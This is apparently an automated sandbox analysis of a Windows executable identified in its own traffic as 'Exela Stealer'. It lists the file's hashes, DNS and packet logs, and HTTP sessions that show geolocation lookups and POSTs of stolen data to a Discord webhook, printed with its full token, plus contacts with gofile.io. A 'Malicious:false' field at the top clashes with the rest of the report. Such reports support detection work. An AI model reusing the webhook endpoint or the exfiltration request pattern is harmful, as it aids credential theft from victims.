SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:false
Preview:..-.....................................8...5.....-.....................................8...5.....
File type:
Entropy (8bit):7.995208917234906
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SecuriteInfo.com.FileRepMalware.22561.28030.exe
File size:9'934'907 bytes
MD5:aecb2c382b2181620aa3243dcbca51c8
SHA1:9b103aa29dd1f39b7bb6261703f144bfdfa4a06e
SHA256:6b9568f25dba66dde3d01baa88ff15ce5165fed7c29c8446d8fab993234a49ce
SHA512:ccc1f0cb5a5db4f65a5f1a21741f4c29784061f6f3da512e14b0cfcef9d949f6f414a61c3f792cb55d2e8196b8bef51b099abdab29db7948e38864a9c28f731d
SSDEEP:196608:ha72hCxocemXyuSyTde8pDOlocCREhS0kCnPnqFrpAChlwc:bcgtByxjp0oVWQsPwAyT
TLSH:26A63378B27009AAFDFB833CC856995ACE73745507A0C6CF07B042619D673E28935FA6
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..
Icon Hash:00928e8e8686b000
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2024 08:20:16.611922979 CET | 49721 | 80 | 192.168.2.6 | 208.95.112.1
Oct 28, 2024 08:20:16.617242098 CET | 80 | 49721 | 208.95.112.1 | 192.168.2.6
Oct 28, 2024 08:20:16.617444992 CET | 49721 | 80 | 192.168.2.6 | 208.95.112.1
Oct 28, 2024 08:20:16.618266106 CET | 49721 | 80 | 192.168.2.6 | 208.95.112.1
Oct 28, 2024 08:20:16.623826027 CET | 80 | 49721 | 208.95.112.1 | 192.168.2.6
Oct 28, 2024 08:20:17.213646889 CET | 80 | 49721 | 208.95.112.1 | 192.168.2.6
Oct 28, 2024 08:20:17.215034008 CET | 49721 | 80 | 192.168.2.6 | 208.95.112.1
Oct 28, 2024 08:20:17.220851898 CET | 80 | 49721 | 208.95.112.1 | 192.168.2.6
Oct 28, 2024 08:20:17.220998049 CET | 49721 | 80 | 192.168.2.6 | 208.95.112.1
Oct 28, 2024 08:20:31.630204916 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:31.630228043 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:31.630296946 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:31.631037951 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:31.631048918 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.256671906 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.257467985 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:32.257491112 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.259139061 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.259208918 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:32.265367031 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:32.265460014 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.265693903 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:32.265705109 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.265800953 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:32.311327934 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.572977066 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.573121071 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.573390961 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:32.574399948 CET | 49766 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:32.574413061 CET | 443 | 49766 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.575829983 CET | 49767 | 443 | 192.168.2.6 | 162.159.136.232
Oct 28, 2024 08:20:32.575871944 CET | 443 | 49767 | 162.159.136.232 | 192.168.2.6
Oct 28, 2024 08:20:32.575948000 CET | 49767 | 443 | 192.168.2.6 | 162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.576576948 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.576587915 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.190942049 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.191705942 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.191718102 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.193186045 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.193263054 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.194459915 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.194547892 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.194843054 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.194849968 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.195050001 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.235348940 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.425586939 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.425744057 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.425796032 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.426623106 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.426651955 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429137945 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429172993 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429244995 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429697037 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429713011 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.046992064 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.047555923 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.047580957 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.049026966 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.049088955 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.050239086 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.050327063 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.050560951 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061707020 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061728954 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061827898 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061856031 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061975956 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062026024 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062144041 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062159061 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062288046 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062314034 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062448978 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062475920 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073199034 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073357105 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073385954 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073410034 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073529959 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073561907 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078002930 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078142881 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078170061 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078193903 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078222990 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078270912 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078291893 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079668045 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079828024 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079854965 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079878092 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079900980 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.132029057 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.132154942 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.132215977 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.133049965 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.133063078 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.830306053 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.830337048 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.830414057 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.831254959 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.831267118 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.680181026 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.681157112 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.681166887 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.682759047 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.683027029 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.684293985 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.684293985 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.684391975 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.729633093 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.729644060 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.776444912 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.916363955 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.916573048 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.916713953 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.917675972 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.917692900 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366039038 CET49775443192.168.2.645.112.123.227
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366077900 CET4434977545.112.123.227192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366298914 CET49775443192.168.2.645.112.123.227
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366942883 CET49775443192.168.2.645.112.123.227
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366959095 CET4434977545.112.123.227192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.418566942 CET4434977545.112.123.227192.168.2.6
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 28, 2024 08:20:16.593777895 CET | 50607 | 53 | 192.168.2.6 | 1.1.1.1 |
| Oct 28, 2024 08:20:16.601882935 CET | 53 | 50607 | 1.1.1.1 | 192.168.2.6 |
| Oct 28, 2024 08:20:31.621450901 CET | 56111 | 53 | 192.168.2.6 | 1.1.1.1 |
| Oct 28, 2024 08:20:31.628758907 CET | 53 | 56111 | 1.1.1.1 | 192.168.2.6 |
| Oct 28, 2024 08:20:35.820827007 CET | 60896 | 53 | 192.168.2.6 | 1.1.1.1 |
| Oct 28, 2024 08:20:35.829410076 CET | 53 | 60896 | 1.1.1.1 | 192.168.2.6 |
| Oct 28, 2024 08:20:37.171366930 CET | 61937 | 53 | 192.168.2.6 | 1.1.1.1 |
| Oct 28, 2024 08:20:38.167334080 CET | 61937 | 53 | 192.168.2.6 | 1.1.1.1 |
| Oct 28, 2024 08:20:38.364249945 CET | 53 | 61937 | 1.1.1.1 | 192.168.2.6 |
| Oct 28, 2024 08:20:38.396809101 CET | 53 | 61937 | 1.1.1.1 | 192.168.2.6 |
| Oct 28, 2024 08:20:40.080992937 CET | 53 | 56208 | 162.159.36.2 | 192.168.2.6 |
| Oct 28, 2024 08:20:40.745975971 CET | 62412 | 53 | 192.168.2.6 | 1.1.1.1 |
| Oct 28, 2024 08:20:40.756285906 CET | 53 | 62412 | 1.1.1.1 | 192.168.2.6 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 28, 2024 08:20:16.593777895 CET | 192.168.2.6 | 1.1.1.1 | 0x3bb6 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:31.621450901 CET | 192.168.2.6 | 1.1.1.1 | 0x9ef1 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:35.820827007 CET | 192.168.2.6 | 1.1.1.1 | 0x4e2b | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:37.171366930 CET | 192.168.2.6 | 1.1.1.1 | 0xe9f5 | Standard query (0) | store1.gofile.io | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:38.167334080 CET | 192.168.2.6 | 1.1.1.1 | 0xe9f5 | Standard query (0) | store1.gofile.io | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:40.745975971 CET | 192.168.2.6 | 1.1.1.1 | 0x5bd9 | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 28, 2024 08:20:16.601882935 CET | 1.1.1.1 | 192.168.2.6 | 0x3bb6 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:31.628758907 CET | 1.1.1.1 | 192.168.2.6 | 0x9ef1 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:31.628758907 CET | 1.1.1.1 | 192.168.2.6 | 0x9ef1 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:31.628758907 CET | 1.1.1.1 | 192.168.2.6 | 0x9ef1 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:31.628758907 CET | 1.1.1.1 | 192.168.2.6 | 0x9ef1 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:31.628758907 CET | 1.1.1.1 | 192.168.2.6 | 0x9ef1 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:35.829410076 CET | 1.1.1.1 | 192.168.2.6 | 0x4e2b | No error (0) | api.gofile.io | | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:38.364249945 CET | 1.1.1.1 | 192.168.2.6 | 0xe9f5 | No error (0) | store1.gofile.io | | 45.112.123.227 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:38.396809101 CET | 1.1.1.1 | 192.168.2.6 | 0xe9f5 | No error (0) | store1.gofile.io | | 45.112.123.227 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 08:20:40.756285906 CET | 1.1.1.1 | 192.168.2.6 | 0x5bd9 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
• discord.com
• api.gofile.io
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49721 | 208.95.112.1 | 80 | 7112 | C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 08:20:16.618266106 CET | 126 | OUT | GET /json HTTP/1.1
    Host: ip-api.com
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Python/3.10 aiohttp/3.10.10
Oct 28, 2024 08:20:17.213646889 CET | 487 | IN | HTTP/1.1 200 OK
    Date: Mon, 28 Oct 2024 07:20:16 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 310
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Dallas","zip":"75247","lat":32.8137,"lon":-96.8704,"timezone":"America/Chicago","isp":"QuadraNet Enterprises LLC","org":"QuadraNet, Inc","as":"AS8100 QuadraNet Enterprises LLC","query":"155.94.241.188"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49766 | 162.159.136.232 | 443 | 7112 | C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-28 07:20:32 UTC | 279 | OUT | POST /api/webhooks/1298294465534099557/tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3hw3K64VoD-wO_IKZJNJCs HTTP/1.1
    Host: discord.com
    Content-Type: application/json
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Python/3.10 aiohttp/3.10.10
    Content-Length: 1379
2024-10-28 07:20:32 UTC | 1379 | OUT | Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Exela Stealer Full Info***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0
2024-10-28 07:20:32 UTC | 1360 | IN | HTTP/1.1 204 No Content
    Date: Mon, 28 Oct 2024 07:20:32 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Set-Cookie: __dcfduid=1e216f5a94fd11efb6560a9110c201af; Expires=Sat, 27-Oct-2029 07:20:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1730100033
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cg98KNks77K4cNi4%2BhlKrPC5aya6%2FvUwVRPndmdYblO5oWi8fYq5bKhkAPCaT%2BNmyE3Gnp7DhbEgOw52rAKCaL%2B%2Bh71ERS1tcEM13J0%2FwgB6IZh195w9BPGn0XNC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=1e216f5a94fd11efb6560a9110c201afbce73423682da63271bdd9680dfe00a70feef1eb1d7d1a2474fc2b3e22f24bda; Expires=Sat, 27-Oct-2029 07:20:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=f278498233ea23dfd3636edd56bbbf04a50691f0-1730100032; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-28 07:20:32 UTC | 211 | IN | Data Ascii: Set-Cookie: _cfuvid=xCMUBgfafn4d66mFj7ohCoEQ.irwrgG.ya2vOQzHgPI-1730100032510-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 8d9929f21d1d2ccc-DFW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49767 | 162.159.136.232 | 443 | 7112 | C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-28 07:20:33 UTC | 278 | OUT | POST /api/webhooks/1298294465534099557/tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3hw3K64VoD-wO_IKZJNJCs HTTP/1.1
    Host: discord.com
    Content-Type: application/json
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Python/3.10 aiohttp/3.10.10
    Content-Length: 512
2024-10-28 07:20:33 UTC | 512 | OUT | Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Keyword Result***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thum
2024-10-28 07:20:33 UTC | 1350 | IN | HTTP/1.1 204 No Content
    Date: Mon, 28 Oct 2024 07:20:33 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Set-Cookie: __dcfduid=1ea3894094fd11efacf622b6acebc9aa; Expires=Sat, 27-Oct-2029 07:20:33 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1730100034
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nliTsl2xLCxd4llRfPEFFWwzRThtzdYt4ZTsYk7bNtylQtwsNnfXmRn3cDLcBsdgXsGVK7AAR0rbpKpIwu7P2Y5nLcydRb8F1fJAD5PblSSkGEI2AVimBBFYE%2Fkp"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                  Set-Cookie: __sdcfduid=1ea3894094fd11efacf622b6acebc9aad33241719ac6fc19df949ab4709e3345a8515649668fcc7981d4bc7a5a922359; Expires=Sat, 27-Oct-2029 07:20:33 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                  Set-Cookie: __cfruid=480bf03a614c46c0a12dfcd7af6d4dd71f41d30c-1730100033; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                  2024-10-28 07:20:33 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 62 6b 38 33 64 43 59 59 6d 47 46 49 57 61 4a 62 65 72 6b 6d 48 65 77 48 6a 76 47 4b 52 50 76 46 30 44 33 6b 75 6a 71 37 35 4a 6b 2d 31 37 33 30 31 30 30 30 33 33 33 36 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 39 39 32 39 66 37 65 39 61 62 34 36 36 65 2d 44 46 57 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: Set-Cookie: _cfuvid=bk83dCYYmGFIWaJberkmHewHjvGKRPvF0D3kujq75Jk-1730100033363-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d9929f7e9ab466e-DFW


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
2          | 192.168.2.6 | 49768       | 162.159.137.232 | 443              | 7112 | C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-28 07:20:34 UTC | 635 | OUT | POST /api/webhooks/1298294465534099557/tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3hw3K64VoD-wO_IKZJNJCs HTTP/1.1
                                                                                                                                                                                                                                  Host: discord.com
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Python/3.10 aiohttp/3.10.10
                                                                                                                                                                                                                                  Cookie: __cfruid=f278498233ea23dfd3636edd56bbbf04a50691f0-1730100032; __dcfduid=1e216f5a94fd11efb6560a9110c201af; __sdcfduid=1e216f5a94fd11efb6560a9110c201afbce73423682da63271bdd9680dfe00a70feef1eb1d7d1a2474fc2b3e22f24bda; _cfuvid=xCMUBgfafn4d66mFj7ohCoEQ.irwrgG.ya2vOQzHgPI-1730100032510-0.0.1.1-604800000
                                                                                                                                                                                                                                  Content-Length: 695494
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=6bb8c0d858ae495f912113e926432cf5
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC36OUTData Raw: 2d 2d 36 62 62 38 63 30 64 38 35 38 61 65 34 39 35 66 39 31 32 31 31 33 65 39 32 36 34 33 32 63 66 35 0d 0a
                                                                                                                                                                                                                                  Data Ascii: --6bb8c0d858ae495f912113e926432cf5
